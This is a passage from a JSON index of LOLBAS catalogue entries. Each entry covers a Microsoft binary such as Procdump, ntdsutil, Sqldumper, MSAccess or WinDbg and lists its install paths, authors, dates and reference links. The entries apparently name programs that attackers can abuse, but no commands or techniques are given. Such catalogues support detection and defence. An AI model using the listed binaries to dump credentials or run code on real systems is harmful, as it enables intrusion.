@mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/"],"count":1},{"id":"lolbas:mpiexec-exe","name":"Mpiexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe","C:\\Program Files (x86)\\Microsoft MPI\\Bin\\mpiexec.exe"],"author":"Avihay Eldad","created":"2025-09-25T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mpiexec/"],"count":1},{"id":"lolbas:msaccess-exe","name":"MSAccess.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSAccess.exe"],"author":"Nir Chako","created":"2023-04-30T00:00:00.000Z","contributors":["Nir Chako @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MSAccess/"],"count":1},{"id":"lolbas:mscopilot-exe","name":"Mscopilot.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot.exe"],"author":"4n4s4zi","created":"2026-04-14T00:00:00.000Z","contributors":["4n4s4zi @4n4s4zi"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot/"],"count":1},{"id":"lolbas:mscopilot-proxy-exe","name":"Mscopilot_proxy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot_proxy.exe"],"author":"4n4s4zi","created":"2026-04-14T00:00:00.000Z","contributors":["4n4s4zi @4n4s4zi"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot_proxy/"],"count":1},{"id":"lolbas:msdeploy-exe","name":"Msdeploy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken","Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"],"count":3},{"id":"lolbas:msohtmed-exe","name":"MsoHtmEd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe"],"author":"Nir Chako","created":"2022-07-24T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/"],"count":1},{"id":"lolbas:mspub-exe","name":"Mspub.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.exe"],"author":"Nir Chako","created":"2022-08-02T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/"],"count":1},{"id":"lolbas:msxsl-exe","name":"msxsl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Ronnie Salomonsen @r0ns3n"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"],"count":6},{"id":"lolbas:nmcap-exe","name":"Nmcap.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Network Monitor 3\\nmcap.exe","C:\\Program Files (x86)\\Microsoft Network Monitor 3\\nmcap.exe"],"author":"Avihay Eldad","created":"2025-09-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Nmcap/"],"count":1},{"id":"lolbas:ntdsutil-exe","name":"ntdsutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\ntdsutil.exe"],"author":"Tony Lambert","created":"2020-01-10T00:00:00.000Z","contributors":["Sean Metcalf @PyroTek3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ntdsutil/"],"count":1},{"id":"lolbas:ntsd-exe","name":"Ntsd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\ntsd.exe"],"author":"Avihay Eldad","created":"2025-07-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntsd/"],"count":1},{"id":"lolbas:openconsole-exe","name":"OpenConsole.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os86\\OpenConsole.exe","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.18.10301.0_x64__8wekyb3d8bbwe\\OpenConsole.exe"],"author":"Nasreddine Bencherchali","created":"2022-06-17T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/"],"count":1},{"id":"lolbas:outlook-exe","name":"Outlook.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe"],"author":"Nir Chako","created":"2022-11-08T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Outlook/"],"count":1},{"id":"lolbas:pixtool-exe","name":"Pixtool.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft PIX\\pixtool.exe","C:\\Program Files (x86)\\Microsoft PIX\\pixtool.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Pixtool/"],"count":1},{"id":"lolbas:powerpnt-exe","name":"Powerpnt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/"],"count":1},{"id":"lolbas:procdump-exe","name":"Procdump.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":["Procdump64.exe"],"fullPath":["no default"],"author":"Alfie Champion (@ajpc500)","created":"2020-10-14T00:00:00.000Z","contributors":["Alfie Champion @ajpc500"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"],"count":2},{"id":"lolbas:protocolhandler-exe","name":"ProtocolHandler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office15\\ProtocolHandler.exe"],"author":"Nir Chako","created":"2022-07-24T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/"],"count":1},{"id":"lolbas:rcsi-exe","name":"rcsi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/rcsi/"],"count":2},{"id":"lolbas:remote-exe","name":"Remote.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"author":"mr.d0x","created":"2021-06-01T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"],"count":3},{"id":"lolbas:sqldumper-exe","name":"Sqldumper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe","C:\\Program Files\\Microsoft Power BI Desktop\\bin\\SqlDumper.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Luis Rocha @countuponsec"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"],"count":2},{"id":"lolbas:sqlps-exe","name":"Sqlps.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\150\\Tools\\Binn\\SQLPS.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Bryon @bryon_","Manny @ManuelBerrueta"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/"],"count":1},{"id":"lolbas:sqltoolsps-exe","name":"SQLToolsPS.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/SQLToolsPS/"],"count":1},{"id":"lolbas:squirrel-exe","name":"Squirrel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"author":"Reegun J (OCBC Bank) - @reegun21","created":"2019-06-26T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21","Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"],"count":5},{"id":"lolbas:te-exe","name":"te.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Giuseppe N3mes1s @gN3mes1s","Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/te/"],"count":2},{"id":"lolbas:teams-exe","name":"Teams.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"author":"Andrew Kisliakov","created":"2022-01-17T00:00:00.000Z","contributors":["Andrew Kisliakov","mr.d0x @mrd0x"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"],"count":3},{"id":"lolbas:testwindowremoteagent-exe","name":"TestWindowRemoteAgent.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\RemoteAgent\\TestWindowRemoteAgent.exe"],"author":"Onat Uzunyayla","created":"2023-08-21T00:00:00.000Z","contributors":["Onat Uzunyayla"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/TestWindowRemoteAgent/"],"count":1},{"id":"lolbas:tracker-exe","name":"Tracker.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subTee"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"],"count":2},{"id":"lolbas:update-exe","name":"Update.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"author":"Oddvar Moe","created":"2019-06-26T00:00:00.000Z","contributors":["Reegun Richard Jayapaul (SpiderLabs, Trustwave) @reegun21","Mr.Un1k0d3r @MrUn1k0d3r","Adam @Hexacorn","Jesus Galvez"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"count":13},{"id":"lolbas:vsdiagnostics-exe","name":"VSDiagnostics.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"],"author":"Bobby Cooke","created":"2023-07-12T00:00:00.000Z","contributors":["Bobby Cooke @0xBoku"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"],"count":2},{"id":"lolbas:vsiisexelauncher-exe","name":"VSIISExeLauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\Extensions\\Microsoft\\Web Tools\\ProjectSystem\\VSIISExeLauncher.exe"],"author":"timwhite","created":"2021-09-24T00:00:00.000Z","contributors":["timwhite"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/"],"count":1},{"id":"lolbas:visio-exe","name":"Visio.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio.exe"],"author":"Avihay Eldad","created":"2024-02-15T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Visio/"],"count":1},{"id":"lolbas:visualuiaverifynative-exe","name":"VisualUiaVerifyNative.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\arm64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\UIAVerify\\VisualUiaVerifyNative.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Lee Christensen @tifkin","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/"],"count":1},{"id":"lolbas:vslaunchbrowser-exe","name":"VSLaunchBrowser.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"author":"Avihay Eldad","created":"2024-04-12T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"],"count":3},{"id":"lolbas:vshadow-exe","name":"Vshadow.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\vshadow.exe"],"author":"Ayberk Halaç","created":"2023-09-06T00:00:00.000Z","contributors":["Ayberk Halaç"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/"],"count":1},{"id":"lolbas:vsjitdebugger-exe","name":"vsjitdebugger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\windows\\system32\\vsjitdebugger.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsjitdebugger/"],"count":1},{"id":"lolbas:wfmformat-exe","name":"WFMFormat.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\there\\is\\no\\default\\installation\\path\\WFMFormat.exe"],"author":"Tim Baker","created":"2024-12-05T00:00:00.000Z","contributors":["Tim Baker (https://www.dotsec.com)"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WFMFormat/"],"count":1},{"id":"lolbas:wfc-exe","name":"Wfc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\wfc.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/"],"count":1},{"id":"lolbas:windbg-exe","name":"WinDbg.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\windbg.exe"],"author":"Avihay Eldad","created":"2025-07-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinDbg/"],"count":1},{"id":"lolbas:winproj-exe","name":"WinProj.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\WinProj.exe"],"author":"Avihay Eldad","created":"2024-02-14T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinProj/"],"count":1},{"id":"lolbas:winword-exe","name":"Winword.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/"],"count":1},{"id":"lolbas:wsb-exe","name":"wsb.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"author":"Konrad 'unrooted' 